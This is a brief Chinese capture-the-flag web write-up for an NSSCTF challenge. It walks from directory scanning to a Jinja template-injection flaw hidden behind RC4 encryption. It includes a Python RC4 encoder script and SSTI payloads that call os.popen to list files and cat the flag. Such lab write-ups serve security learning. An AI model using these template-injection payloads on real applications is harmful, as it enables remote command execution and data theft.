这里结合了加密 记录一下
首先获取
啥都没得
扫一下目录
都看看
后面发现
http://node5.anna.nssctf.cn:28378/secret这个页面
Tell me 是不是就是传参 我们get传递一个看看
http://node5.anna.nssctf.cn:28378/secret?secret={{49}}
发生报错 出现了 框架 这里一看就是框架漏洞了
然后我们看看报错信息
因为经过测试 我们可以发现输入1 会回显其他字符 这里肯定说明存在加密
这里出现了 说明我们需要传递一个RC4的加密进去 并且密文为
HereIsTreasure
所以我们可以通过脚本来实现
import base64
from urllib import parse
def rc4_main(key="init_key", message="init_message"): # 返回加密后得内容
s_box = rc4_init_sbox(key)
crypt = str(rc4_excrypt(message, s_box))
return crypt
def rc4_init_sbox(key):
s_box = list(range(256))
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
return s_box
def rc4_excrypt(plain, box):
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
cipher = "".join(res)
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
key = "HereIsTreasure" # 此处为密文
message = input("请输入明文:\n")
enc_base64 = rc4_main(key, message)
enc_init = str(base64.b64decode(enc_base64), 'utf-8')
enc_url = parse.quote(enc_init)
print("rc4加密后的url编码:" + enc_url)
# print("rc4加密后的base64编码"+enc_base64)
然后就可以进行正常的ssti了
{{lipsum.__globals__['os'].popen("ls").read()}}
然后我们直接cat f*即可
{{lipsum.__globals__['os'].popen("cat /f*").read()}}
